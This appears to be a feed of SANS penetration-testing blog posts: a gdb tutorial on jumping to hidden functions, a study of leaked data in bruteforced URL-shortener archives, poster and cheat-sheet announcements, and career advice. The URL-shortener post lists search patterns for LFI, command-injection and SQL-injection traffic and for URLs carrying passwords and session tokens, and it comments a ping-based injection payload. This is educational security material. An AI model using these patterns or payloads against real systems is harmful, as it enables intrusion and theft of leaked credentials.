Using gdb to Call Random Functions!

By Ron Bowes

Sometimes reverse engineering is graceful and purposeful, where you thread the needle just right to figure out some obscure, undocumented function and how it can be used to the best of your ability. This article isn’t about that.

In this post, we’ll look at how we can find hidden functionality by jumping to random functions in-memory! This is normally a good way to crash the program, but who knows? You might find a gem!

This technique is useful for finding hidden functionality, but it’s somewhat limited: it’ll only work for applications that you’re capable of debugging. With few exceptions (I’ve used a technique like this to break out of an improperly implemented sandbox before), this technique is primarily for analysis, not for exploitation or privilege escalation.

Creating a Test Binary

Let’s start by writing a simple toy program. You can download this program as a 32- and 64-bit Linux binary, as well as the source code and Makefile, here.

Here’s the full code:


#include <stdio.h>

void random_function() {
  printf("You called me!\n");
}

int main(int argc, char *argv[]) {
  printf("Can you call random_function()?\n");
  printf("Press <enter> to continue\n");
  getchar();

  printf("Good bye!\n");
}

Put that in a file called jumpdemo.c and compile with the following command:

gcc -g -O0 -o jumpdemo jumpdemo.c

We add -O0 to the command line to prevent the compiler from performing optimizations such as deleting unused functions under the guise of “helping”. If you grabbed our source code, you can simply run make after extracting it.

Finding Interesting Functions

Let’s assume for the purposes of this post that the binaries are compiled with symbols. That means that you can see the function names! My favorite tool for analyzing binaries is IDA, but for our purposes, the nm command is more than sufficient:


$ nm ./jumpdemo
0000000000601040 B __bss_start
0000000000601030 D __data_start
0000000000601030 W data_start
0000000000601038 D __dso_handle
0000000000601040 D _edata
0000000000601048 B _end
0000000000400624 T _fini
                 U getchar@@GLIBC_2.2.5
                 w __gmon_start__
0000000000400400 T _init
0000000000400630 R _IO_stdin_used
                 w _ITM_deregisterTMCloneTable
                 w _ITM_registerTMCloneTable
                 w _Jv_RegisterClasses
0000000000400620 T __libc_csu_fini
00000000004005b0 T __libc_csu_init
                 U __libc_start_main@@GLIBC_2.2.5
0000000000400577 T main
                 U puts@@GLIBC_2.2.5
0000000000400566 T random_function
0000000000400470 T _start
0000000000601040 D __TMC_END__

Everything you see here is a symbol. The ones marked with T live in the code (text) section, which means they’re functions we can actually call. The ones that start with an underscore (‘_’) are compiler- and runtime-generated stuff that we can ignore for now (in a “real” situation, you shouldn’t discount a symbol simply because its name starts with an underscore, of course).
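If you want just the callable candidates, you can filter nm’s output. Here’s a quick sketch (assuming GNU binutils, run from the directory containing the compiled jumpdemo binary):

```shell
# Keep only text-section (T) symbols, then drop the
# underscore-prefixed compiler/loader plumbing.
nm ./jumpdemo | grep ' T ' | grep -v ' T _'
```

On our toy binary, this leaves just main and random_function.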

The two functions that might be interesting are “main” and “random_function”, so that’s what we’re going to target!

Load in gdb

Before we can call one of these functions, we need to load the program in gdb — the GNU Project Debugger. On the command line (from the directory containing the compiled jumpdemo binary), load ./jumpdemo in gdb:


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb)

The -q flag is simply to disable unnecessary output. After you get to the (gdb) prompt, the jumpdemo application is loaded and ready to run, but it hasn’t actually been started yet. You can verify that by trying to run a command such as continue:


(gdb) continue
The program is not being run.

gdb is an extremely powerful tool, with a ton of different commands. You can enter help into the prompt to learn more, and you can also use help <command> on any of the commands we use (such as help break) to get more details. Give it a try!

Simple Case: Just Call It!

Now that the program is ready to go in gdb, we can run it with the run command (don’t forget to try help run!). You’ll see the same output as if you’d run it directly; when the program ends, we’re back in gdb. You can run it over and over if you desire, but that’s not really going to get you anywhere.

To modify the application at runtime, we need to start the program and then stop it again before it finishes cleanly. The most common way is to set a breakpoint (help break) on main:


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x40057b
(gdb) 

Then run the binary and watch what happens:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo

Breakpoint 1, 0x000000000040057b in main ()
(gdb) 

Now we have control of the application in the running (but paused) state! We can view/edit memory, modify registers, continue execution, jump to another part of the code, and much much more!

In our case, as I’m sure you’ve guessed by now, we’re going to move the program’s execution to another part of the program. Specifically, we’re just going to use gdb’s jump command (help jump!) to resume execution at the start of random_function():


$ gdb -q ./jumpdemo
Reading symbols from ./jumpdemo...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x40057b
(gdb) run
Starting program: /home/ron/blogs/jumpdemo 

Breakpoint 1, 0x000000000040057b in main ()
(gdb) help jump
Continue program being debugged at specified line or address.
Usage: jump <location>
Give as argument either LINENUM or *ADDR, where ADDR is an expression
for an address to start at.
(gdb) jump random_function
Continuing at 0x40056a.
You called me!
[Inferior 1 (process 11391) exited with code 017]

We did it! The program printed “You called me!”, which means we successfully ran random_function()! Exit code 017 means the process didn’t exit cleanly, but that is to be expected: we just ran an unexpected function with absolutely no context!

If for some reason you can’t get breakpoints to work (maybe the program was compiled without symbols and you don’t actually know where main is), you can do the same thing without breakpoints by pressing ctrl-c while the binary is running:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo 
Can you call random_function()?
Press <enter> to continue
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04260 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) jump random_function
Continuing at 0x40056a.
You called me!
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000001 in ?? ()

Don’t worry about the segmentation fault; like the 017 exit code above, it happens because the program has no idea what to do after it finishes running random_function.
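Incidentally, once you know the sequence of commands you want, gdb can run them non-interactively. This is a sketch using the -batch and -ex flags (assuming the compiled jumpdemo binary from earlier is in the current directory):

```shell
# Scripted version of the session above: break at main, run until
# the breakpoint hits, then resume execution at random_function.
gdb -batch -q \
    -ex 'break main' \
    -ex 'run' \
    -ex 'jump random_function' \
    ./jumpdemo
```

-batch makes gdb exit after the last command instead of dropping you at the (gdb) prompt, which is handy when you want to try a whole list of functions in a loop.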

Another mildly interesting thing that you can do is jump back to main() to make the program think it’s starting over:


(gdb) run
Starting program: /home/ron/blogs/jumpdemo 
Can you call random_function()?
Press <enter> to continue
^C
Program received signal SIGINT, Interrupt.
0x00007ffff7b04260 in __read_nocancel () at ../sysdeps/unix/syscall-template.S:84
84      ../sysdeps/unix/syscall-template.S: No such file or directory.
(gdb) jump main
Continuing at 0x40057b.
Can you call random_function()?
Press <enter> to continue

I use jump-back-to-main a lot while doing actual exploit development to check whether or not I actually have code execution without trying to develop working shellcode. If the program appears to start over, you’ve changed the current instruction!

Real-world Example

For a quick example of this technique doing something visible against a “real” application, I took a look through my tools/ folder for a simple command line Linux application, and found THC-Hydra. I compiled it the standard way — ./configure && make — and ran nm against it:


$ nm ./hydra
0000000000657abc b A
0000000000657cb4 B accntFlag
                 U alarm@@GLIBC_2.2.5
000000000043baf0 T alarming
0000000000657ae4 B alarm_went_off
00000000004266f0 T analyze_server_response
0000000000654200 B apop_challenge
                 U ASN1_OBJECT_free@@OPENSSL_1.0.0
                 U __assert_fail@@GLIBC_2.2.5
0000000000655c00 B auth_flag
0000000000657ab8 b B
0000000000408b60 T bail
000000000044b760 r base64digits
000000000044b6e0 r base64val
0000000000433450 T bf_get_pcount
…

Turns out, there are over 700 exported symbols. Wow! We can narrow the list down by grepping for T, which marks a symbol in the code (text) section, but there are still a lot of those. I manually looked over the list to find ones that might work (i.e., functions that might print output without having any valid context or parameters).

I started by running the application with a “normal” set of arguments to make note of the “normal” output:


$ gdb -q --args ./hydra -l john -p doe localhost http-head
Reading symbols from ./hydra...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/ron/tools/hydra-7.1-src/hydra -l john -p doe localhost http-head
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2018-10-15 14:47:12
Error: You must supply the web page as an additional option or via -m
[Inferior 1 (process 3619) exited with code 0377]
(gdb)

The only new thing here is --args, which tells gdb that everything after the binary name is a command line argument for the binary.

After I determined what the output is supposed to look like, I set a breakpoint on main, like before, and jumped to help() after breaking:

$ gdb -q --args ./hydra -l john -p doe localhost http-head
Reading symbols from ./hydra...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x403bf0
(gdb) run
Starting program: /home/ron/tools/hydra-7.1-src/hydra -l john -p doe localhost http-head
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, 0x0000000000403bf0 in main ()
(gdb) jump help
Continuing at 0x408420.
Syntax: (null) [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
...

I tried help_bfg as well:


(gdb) jump help_bfg
Continuing at 0x408580.
Hydra bruteforce password generation option usage:

  -x MIN:MAX:CHARSET

     MIN     is the minimum number of characters in the password
     MAX     is the maximum number of characters in the password
     CHARSET is a specification of the characters to use in the generation
             valid CHARSET values are: 'a' for lowercase letters,
             'A' for uppercase letters, '1' for numbers, and for all others,
             just add their real representation.

Examples:
   -x 3:5:a  generate passwords from length 3 to 5 with all lowercase letters
   -x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
   -x 1:3:/  generate passwords from length 1 to 3 containing only slashes
   -x 5:5:/%,.-  generate passwords with length 5 which consists only of /%,.-

The bruteforce mode was made by Jan Dlabal, http://houbysoft.com/bfg/
[Inferior 1 (process 9980) exited with code 0377]

Neat! Another help output! Although these are easy to get to legitimately, it’s really neat to see them appear when the functions aren’t expected to be called. Stuff “just works”, kinda.

Speaking of kinda working, I also jumped to hydra_debug(), which had slightly more interesting results:


(gdb) jump hydra_debug
Continuing at 0x408b40.
[DEBUG] Code: ����   Time: 1539640228
[DEBUG] Options: mode 0  ssl 0  restore 0  showAttempt 0  tasks 0  max_use 0 tnp 0  tpsal 0  tprl 0  exit_found 0  miscptr (null)  service (null)
[DEBUG] Brains: active 0  targets 0  finished 0  todo_all 0  todo 0  sent 0  found 0  countlogin 0  sizelogin 0  countpass 0  sizepass 0
[Inferior 1 (process 7761) exited normally]

It does its best to print out the statistics, but because it didn’t expect that function to be called, it just prints nonsense.

Every other function I tried either did nothing or simply crashed the application. That’s unsurprising: when you call a function that expects certain parameters without providing any, it normally ends up accessing invalid memory. It’s actually surprising that hydra_debug() worked at all; it’s pure luck that the garbage it tried to print was readable-but-invalid string data rather than unmapped memory (which would have crashed).

Conclusion

This may not seem like much, but it’s actually a very simple and straightforward reverse engineering technique that sometimes works shockingly well. Grab some open source applications, run nm on them, and try calling some functions. You never know what you’ll figure out!

–Ron Bowes
@iagox86

SANS Pen Test Poster: Pivots Payloads Boardgame

 

We are excited to introduce to you the new SANS Penetration Testing Educational Poster, “Pivots & Payloads Board Game”! It is both a poster and a board game. How is it a board game? You can lay it down on a table, cut out the game pieces and game modifiers, roll a die to move your piece around the board… and play with your friends, colleagues, and/or family.

The board game takes you through pen test methodology, tactics, and tools with many possible setbacks that defenders can utilize to hinder forward progress for a pen tester or attacker. The game helps you learn while you play. It’s also a great way to showcase to others what pen testers do and how they do it.

We have made the poster/board game available to download, with additional downloads of the cheat sheets, game pieces, and game modifiers. We will add additional content to this blog page as we continue to evolve the board game and improve on it in future versions.

Download PDF of Pivots & Payloads:

http://blogs.sans.org/pen-testing/files/2018/11/PEN-PR-BGP_v1_1018_WEB_11052018.pdf


Additional Pivots & Payloads:

Desktop Wallpaper

PEN-PR-BGP_v1_1018_wallaperV1

PEN-PR-BGP_v1_1018_wallaperV2

Game Pieces – Print PDF

Pieces

Cheat Sheets – Print PDF

HashCat

Recon

NetCat


Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying-style video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions for free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen

The Secrets in URL Shortening Services


 

Authors: Chris Dale (@ChrisADale) and Vegar Linge Haaland (@vegarlh) created this post to bring awareness to the dangers of using URL shortening services. They both work at Netsecurity, a company that serves a multitude of customers internationally with services in networking, security operations, IR, and penetration testing.

 

URL shortening services are in common use today. They allow you to create convenient short URLs that serve as redirects to otherwise long and complex URLs. A shortened URL can look like this: https://bit.ly/2vmdGv8 . Once clicked, you are immediately redirected to whichever URL bit.ly has stored behind the magic value of 2vmdGv8. A team from archiveteam.org, called URLTeam, has taken on the task of discovering what secrets these magic values hold.

 

URLTeam’s mission is to take these shortening services, e.g. https://bit.ly and https://tinyurl.com, and bruteforce the possible values their magic values can hold. The team is currently working across a bunch of shortening services, all of which can be found here: https://www.archiveteam.org/index.php?title=URLTeam#URL_shorteners; about 130 different services are supported at the moment. Their efforts effectively reveal the destination redirect behind each magic value, and we can very quickly find juicy information!
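To get a sense of the job, note that these magic values are typically base-62 strings (a–z, A–Z, 0–9), so even six characters give roughly 62^6 ≈ 57 billion possibilities. A toy illustration of the enumeration a bruteforcer walks through (bit.ly is used purely as an example prefix; please don’t actually hammer anyone’s service):

```shell
# Walk a tiny slice of a 2-character base-62 keyspace and print the
# candidate short URLs a bruteforcer would try to resolve.
for a in a b c; do
  for b in 0 1 2; do
    echo "https://bit.ly/$a$b"
  done
done
```

A real bruteforcer then requests each candidate and records the Location header of the redirect, which is exactly the data set URLTeam publishes.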

 

The information one can find includes, for example, URLs pointing to file shares that are otherwise undiscoverable, links to testing and staging systems, and even some “attack-in-progress” URLs where we can see attacks against target systems. For penetration testers, searching through the bruteforced results can be a helpful addition to the reconnaissance process, as it might reveal endpoints and systems that would otherwise have gone undiscovered.

This blog post describes how to set yourself up to search through this amazing data set easily. First comes some analysis of the data available, and then some quick-and-dirty setup instructions so you can make the data set available to yourself.


 

Revealing secrets

Let’s take a look at the types of sensitive, funny, and otherwise interesting information we can find in URL shortener data. Below are some examples of the things we found by just casually searching, utilizing Google Hacking Database (https://www.exploit-db.com/google-hacking-database/) style searches. We have tried to redact the domain names in question in order to protect the vulnerable companies.

 

Hack in-progress

First out is the “Hack In-Progress” type of URLs. I am guessing black-hats, and perhaps others too, are using these to share their work in progress with their peers. Some of the identified URLs seem to be simple Proof-Of-Concepts, while others are designed for data exfiltration.

 

Below we see attacks trying to exploit a Local File Inclusion (LFI) vulnerability by including the Linux file /proc/self/environ. This file is commonly abused to try to get a shell once an LFI vulnerability has been found.

Search term: {"wildcard": {"uri_param.keyword": "*/proc/self/environ"}}

Then we see some further expansions on the LFI vulnerabilities, using a null byte (%00) to abuse string termination, a vulnerability commonly found on older PHP installations, for example.

Search term: {"wildcard": {"uri_param.keyword": "*%00"}}

We also see attacks containing carriage returns (%0D) and line feeds (%0A). In this example we see an attempted command injection, trying to ping localhost 5 times. The attacker measures the time taken by a normal request, i.e. one without the attack payload, vs. the request below. If the request with the payload takes approximately 5 seconds longer to complete, it confirms the attack vector, and command injection is very likely possible.

Search term: {"wildcard": {"uri_param.keyword": "*%0a"}}
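The timing check described above can be sketched like this (sleep stands in for the HTTP requests to a hypothetical target; in practice you would time curl against the real URL, with and without the payload):

```shell
# measure: print the wall-clock seconds a command takes to run.
measure() {
  _start=$(date +%s)
  "$@" > /dev/null 2>&1
  echo $(( $(date +%s) - _start ))
}

baseline=$(measure sleep 0)   # the normal request, no payload
attack=$(measure sleep 5)     # the request carrying ";ping -c 5 localhost"
echo "delta: $(( attack - baseline ))s"   # a ~5s delta suggests the command ran
```

Repeating the measurement a few times and comparing averages guards against a single slow response producing a false positive.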

And finally, of course, SQL Injection queries.

 

Search term: "Union all"

 

Backup data

Next up in the line of examples is backed-up data. Many developers and IT operators make temporary backups available online, and it is evident that some of them have used URL shorteners to make life more convenient while sharing these. This vulnerability classifies as an information leak.

 

Search terms:
  {"wildcard": {"uri_path.keyword": "*.bak"}}
  {"wildcard": {"uri_path.keyword": "*.sql"}}

File sharing

Another common finding is people sharing files with no password protection, assuming that the random identifiers (magic values) will keep the documents safe. But when they use a URL shortener, they effectively share the URL with the world. In this case we’re looking for Google Documents, and honestly there are so many sensitive documents leaked here, across a plethora of different file sharing services.

 

Search terms:
  uri_domain:docs.google.com
  uri_main_domain.keyword:mega.nz
  uri_main_domain.keyword:1drv.ms

 

 

Booking reservations and similar

Cloud storage links are not the only passwordless links that are being shared online. Hotel and travel ticket systems also commonly send you emails with passwordless links for easy access to your booking details, as handily provided below:

 

Search term: uri_domain:click.mail.hotels.com

 

 

 

Test, Staging and Development environments

There are also a lot of test systems being deployed, and links are often shared between developers. Searching for test, beta, development, etc. often reveals some interesting results as well.

 

Search terms:
  uri_lastsub_domain:test
  uri_lastsub_domain.keyword:staging

 

Login tokens and passwords

Session tokens in URLs have long been considered bad practice, primarily because proxies and shoulder-surfing attacks could potentially compromise your current session. The dataset contains many examples of URLs with sensitive info, e.g. tokens and passwords.

Search terms:
  {"wildcard": {"uri_param.keyword": "*password=*"}}
  {"wildcard": {"uri_param.keyword": "*jsessionid=*"}}

Conclusions

Looking at archiveteam.org’s data, it is evident that sensitive data is being shortened carelessly. These services are clearly being used without much thought about who else can gain access to the URLs, a classic example of security through obscurity. Obviously, someone with bad intentions could abuse this to their advantage, but organizations could also use these same services to look for their own data being leaked, and possibly compromised. Furthermore, penetration testers could use these techniques to look for their customers’ data, providing potentially valuable intelligence on the attack surface they could work on.

 

What type of vulnerabilities and information leaks can you find? Please share in the comments below. In the next section we share how to get this setup running on your own server, so you can start analyzing and protecting yourself.

 

Setup and Installation

A detailed description of the configuration in use would probably require its own article, so to avoid making this one too long we will not go deep into the configuration details; instead, we give a brief description of the components in use.

Our current setup involves two servers: an OpenBSD server that fetches files, sends them to the database server, and relays HTTPS requests; and a second server running an ELK (Elasticsearch / Logstash / Kibana) stack on FreeBSD with ZFS. The stack is composed of the following components:

  • Elasticsearch: The database.
  • Logstash: Log and data-parser. Parses the data to a common format and feeds it into Elasticsearch.
  • Kibana: A web server and frontend for Elasticsearch.

 

Setting up these services is common practice, and a multitude of tutorials exist on how to accomplish it.

 

On the OpenBSD server we have a script for downloading archives from archive.org. Files are decompressed, and their content is appended to a file which is monitored by Filebeat. Filebeat then sends the data to Logstash running on the Elasticsearch server. Logstash is set up with some custom grok filters that split the URLs into separate fields, giving us some handy fields to use for filtering and graphs. Logstash then sends the processed data to Elasticsearch. The data is stored in indices based on the top-level domain (.com, .org, .no, etc.), which speeds up searches scoped to a specific top-level domain. Below you can see the fields we have extracted from the URLs.

[Screenshot: the URL fields extracted by Logstash]

 

As an example, uri_lastsub_domain contains the left-most (bottom-level) domain label. This is handy when you want to filter on sub-domains starting with “api” or “dev”, etc.
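As a rough illustration of the splitting, here is pure shell parameter expansion standing in for the actual grok filters (the field names follow the post; the example URL is made up):

```shell
# Split a URL into the same kinds of fields the Logstash filters produce.
url='https://api.dev.example.com/admin/backup.sql?password=hunter2'

rest=${url#*://}                      # drop the scheme
uri_domain=${rest%%/*}                # full host: api.dev.example.com
path_and_params=${rest#"$uri_domain"} # /admin/backup.sql?password=hunter2
uri_path=${path_and_params%%\?*}      # /admin/backup.sql
uri_param=${path_and_params#*\?}      # password=hunter2 (when a '?' is present)
uri_lastsub_domain=${uri_domain%%.*}  # left-most label: api

echo "$uri_domain | $uri_path | $uri_param | $uri_lastsub_domain"
```

The real filters also handle edge cases (missing query strings, ports, multi-part TLDs) that this sketch ignores.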

 

After feeding the data to the database we can start searching and looking through the data.

We can use the Discovery page in Kibana to discover interesting data. We can also use the Dev tools page to make more advanced queries, e.g. regex searches for hashes.

 

Example of use:

Searching through archives from the last 60 days, including only .com domains using the string “(union AND select) OR (select AND concat)” yields an amazing 6,995 results as per the following screenshot:

[Screenshot: Kibana search results]

The Kibana Dashboard allows us to present some colorful and useful graphs:

[Screenshot: Kibana dashboard graphs]

 

Performance and Speed

Currently, the DB server with the ELK stack runs on a low-end VPS. Searching for “test” through all 83,927,323 .com records currently in Elasticsearch, via Kibana, takes 3-5 seconds. Speed depends on the type of search, though: if we search a specific field for a non-analyzed string in the same index, it takes about 23 seconds. Still not too bad. This is particularly useful when a search term includes special characters.

 

Search Options

In Kibana, the main search options are the search bar in Discover and custom queries using Dev tools. The former is good for quick searches and provides a nice list of the results. The listing can easily be modified to include the fields you need, and you can adjust it as you go. When working with results in the Discover page, you can also filter on specific field data, allowing you to very easily filter out uninteresting data as you browse through the results. This is shown in the screenshot below:

[Screenshot: filtering on field data in Discover]

 

The console UI in the Dev tools page is a great place to build up specific queries. It lets us query Elasticsearch directly:

[Screenshot: the Dev tools console]

Searching and processing data from the terminal

Elasticsearch results are returned in JSON format. This makes it easy to write tools to interact with the data, and also to process the data on, for example, a UNIX terminal. Let’s say we want to get all results containing the string “../” and see how many different domains we get hits on. To do this we can simply query the Elasticsearch server with curl and pipe the output to a file. For example:

curl -s -X POST -H "Content-Type: application/json" \
  'http://localhost:9200/logstash-shorturls-.com/_search?scroll=10m&size=5000' -d '
{
  "query": {
    "wildcard": {
      "uri_param.keyword": "*../*"
    }
  }
}' > res

 

This normally results in a huge block of JSON text, so we run it through jq and extract just the information we need:

cat res | jq .hits.hits[]._source.uri_domain > res.dom

Finally we summon the power of standard Unix tools to process the data:

cat res.dom | cut -d"\"" -f2 | sort | uniq | wc -l

873

This could obviously all be done in a single command, without storing any files; it is just a trivial example to show that we can easily process the data in whichever manner we want. Now that we have the domains, we can do more fun stuff, like:

grep -f res.dom bug-bounty-domains.txt
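For completeness, the single-command version alluded to above (assuming the same local Elasticsearch instance; jq’s -r flag emits raw strings, so the cut step is no longer needed):

```shell
# Query Elasticsearch, pull uri_domain out of every hit, and count
# the unique domains, all in one pipeline.
curl -s -X POST -H "Content-Type: application/json" \
  'http://localhost:9200/logstash-shorturls-.com/_search?scroll=10m&size=5000' \
  -d '{"query":{"wildcard":{"uri_param.keyword":"*../*"}}}' \
  | jq -r '.hits.hits[]._source.uri_domain' | sort -u | wc -l
```

sort -u collapses the duplicate-then-count steps (sort | uniq) into one.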

 

Happy hunting!

 

SANS Note:

Chris Dale has four upcoming SANS Pen Test Webcasts scheduled –

 


SANS Cheat Sheet: Python 3

 

by: Mark Baggett

Python 2 – The end of the world as we know it.

It will happen. In the year 2020 an event will occur that will alter the course of information security forever. What is this apocalyptic event? The end of life for Python 2. Is it that big of a deal? Meh. I’m just being dramatic. As of 2020 they will stop releasing updates and patches to Python 2. But Python 2 isn’t going anywhere. If history has taught us anything about what happens to unsupported software, we will continue to see it running critical infrastructure and hospital equipment for many years to come. Programs that run in Python 2 interpreters today will continue to run in Python 2 interpreters well after 2020. Sadly, some organizations are still running old Python 2.5 interpreters today, despite the fact that it is now 13 years old and has serious security issues. It’s pretty safe to say that we will continue to see Python 2 for the foreseeable future.

That said, I think it is a little short-sighted to continue to develop new tools and automation in Python 2 today. You should definitely be developing new code that works in Python 3, and any new tools you purchase and plan to use for more than a year should run in Python 3. You should also weigh the risk of running an old, potentially vulnerable Python 2 interpreter once it is no longer supported against the cost of updating your code to work with a supported interpreter. As you look to the future, you should do so with Python 3 in your sights.

The SANS SEC573 course, Automating Information Security with Python, and the associated GPYC certification ride the Python 2/Python 3 fence along with the rest of the industry. The course teaches you to build new tools for the automation of common defensive, forensic, and offensive tasks in Python 3. Developing new tools in Python 3 will set you up for success moving forward. We also cover what you need to know to convert your existing Python 2 code to Python 3. If you need to continue to use Python 2, we will teach you how to write code that is forward compatible with Python 3, so you are ready to switch when you are eventually forced to. In my opinion it isn’t really a choice between Python 2 and Python 3: the answer is both. We will be supporting both versions for a while. In celebration of that fact, here are the SEC573 Python 2 and Python 3 cheat sheets, available for you to download and print! Enjoy!

 

DOWNLOAD – Python 2.7 Cheat Sheet


DOWNLOAD – Python 3 Cheat Sheet


 



SANS Poster – White Board of Awesome Command Line Kung Fu (PDF Download)

 

by: SANS Pen Test Team

Imagine you are sitting at your desk and come across a great command line tip that will assist you in your career as an information security professional. You jot the tip down on a Post-it note or scrap of paper and tape it to your whiteboard. Now imagine you do this every time you find a useful tip, until your whiteboard is completely full of tricks you can use daily.

That is the concept behind the SANS Pen Test Poster: White Board of Awesome Command Line Kung-Fu created by the SANS Pen Test Instructors. Each tip was submitted by the Pen Test Instructors and curated by SANS Fellow, Ed Skoudis.

We are giving you a complete white board full of tips you can use to become a better InfoSec professional.

Now it is available for you to download.

Download PDF – PENT-PSTR-WHITEBOARD-V3-0118_web.pdf

PENT-PSTR-WHITEBOARD-V3-0118_web_small

PENT-PSTR-WHITEBOARD-V3-0118_web_small_back

 

Additional Educational Posts based on the Poster:

Python:

“White Board” – Python – Python Debugger
“White Board” – Python – Python Reverse Shell!
“White Board” – Python – Pythonic Web Server
“White Board” – Python – Raw Shell -> Terminal
“White Board” – Python – Pythonic Web Client

Bash:

“White Board” – Bash – Useful IPv6 Pivot
“White Board” – Bash – Encrypted Exfil Channel!
“White Board” – Bash – What’s My Public IP Address?
“White Board” – Bash – Bash’s Built-In Netcat Client
“White Board” – Bash – Check Service Every Second
“White Board” – Bash – Make Output Easier to Read
“White Board” – Bash – Website Cloner
“White Board” – Bash – Sudo… Make Me a Sandwich
“White Board” – Bash – Find Juicy Stuff in File System

CMD.exe:

“White Board” – CMD.exe – C:\> netsh interface
“White Board” – CMD.exe – C:\> wmic process

PowerShell:

“White Board” – PowerShell – Add a Firewall Rule
“White Board” – PowerShell – Built-in Port Scanner!
“White Board” – PowerShell – Get Firewall Rules
“White Board” – PowerShell – One-Line Web Client
“White Board” – PowerShell – Ping Sweeper!
“White Board” – PowerShell – Find Juicy Stuff in the File System

 

Desktop Wallpapers based on Poster:

Bash, PowerShell, Python…

Python_1280x1024(example)

 


So You Wanna Be a Pen Tester? 3 Paths To Consider (Updated)

Tips for Entering the Penetration Testing Field

By Ed Skoudis

It’s an exciting time to be a professional penetration tester. As malicious computer attackers amp up the number and magnitude of their breaches, the information security industry needs an enormous amount of help in proactively finding and resolving vulnerabilities. Penetration testers who are able to identify flaws, understand them, and demonstrate their business impact through careful exploitation are an important piece of the defensive puzzle.

In the courses I teach on penetration testing, I’m frequently asked about how someone can land their first job in the field after they’ve acquired the appropriate technical skills and gained a good understanding of methodologies. Also, over the past decade, I’ve counseled a lot of my friends and acquaintances as they’ve moved into various penetration testing jobs. Although there are many different paths to pen test nirvana, let’s zoom into three of the most promising. It’s worth noting that these three paths aren’t mutually exclusive either. I know many people who started on the first path, jumped to the second mid-way, and later found themselves on path #3. Or, you can jumble them up in arbitrary order.

Path A: General Enterprise Security Practitioner Moving to Penetration Testing

First, you could parlay a job in the security group of an enterprise (whether a corporate, government, or educational position) into vulnerability assessment and then penetration testing. For example, today you may be a security auditor, administrator, analyst, or a member of a Security Operations Center (SOC) team. Tell your management that you are keenly interested in vulnerability assessment and penetration testing, and offer your support in existing projects associated with those tasks. You might have to start by taking one for the team and putting in your own hours to help out, without getting a break from your "regular" job. Consider this extra time an investment in yourself. At first, you could help with tasks such as project scoping, false positive reduction, and remediation verification. Later, offer help in preparing a high-quality penetration testing report. Over the space of several months or even a year, you'll demonstrate increasing skills and can ask management or other groups in your enterprise for a move more directly into the heart of penetration testing work.

Path B: Working for a Company or Division that Focuses on Penetration Testing

There are many companies that provide third-party penetration testing services to other companies, including organizations such as Verizon, Trustwave, and FishNet Security. Many of these organizations are looking to hire exceptional penetration testers, especially those who have experience. If you have no direct penetration testing experience, you may still want to try your hand by applying for a junior role in such organizations. A solid background in secure networking, development, or operations will prove helpful. But, if experience is absolutely required, consider moving through Paths A or C to hone your skills before jumping to Path B.

Path C: Going Out on Your Own

If you are more entrepreneurially minded, you may want to consider forming your own small company on the side to do vulnerability assessment for local small businesses, such as a local florist or auto mechanic. Start with just vulnerability assessment services, and build your skills there before going into full-blown penetration testing. There are a couple of huge caveats to take into account with this path, though. First off, make sure you get a good draft contract and statement of work template drawn up by a lawyer to limit your liability. Next, get some liability and errors & omissions insurance for penetration testing. Such protection could cost a few thousand dollars annually, but is vital in doing this kind of work. Once you’ve built your vulnerability assessment capabilities, you may want to gradually start looking at carefully exploiting discovered flaws (when explicitly allowed in your Statements of Work) to move from vulnerability assessment to penetration testing. After your small business is humming, you may decide to stick with this path, growing your business, or jump into Paths A or B.

Regardless of whether you go down paths A, B, C, or your own unique approach to entering the penetration testing industry, always keep in mind that your reputation and trustworthiness are paramount in the information security field. Your name is your personal brand, so work hard, be honest, and always maintain your integrity. Additionally, build yourself a lab of four or five virtual machines so you can practice your technical skills regularly, running scanners, exploitation tools, and sniffers so you can understand your craft at a fine-grained level. Learn a scripting language such as Python or Ruby so you can start automating various aspects of your tasks and even extend the capabilities of tools such as the Metasploit framework. And, most of all, give back to the community by writing a blog, sharing your ideas and techniques, and releasing scripts and tools you’ve created. You see, to excel in pen testing, you can’t think of it as a job. It is a way of life. Building a sterling reputation and contributing to others is not only beneficial to the community, but it will provide many direct and indirect benefits to you as you move down your path from new penetration tester to seasoned professional.

Additional SANS Penetration Testing Resources

Watch: WEBCAST – So, You Wanna Be a Pen Tester?

EdSkoudis_SoYouWannaBeAPenTester_06192018

Available Now!
Recorded: 6/19/2018
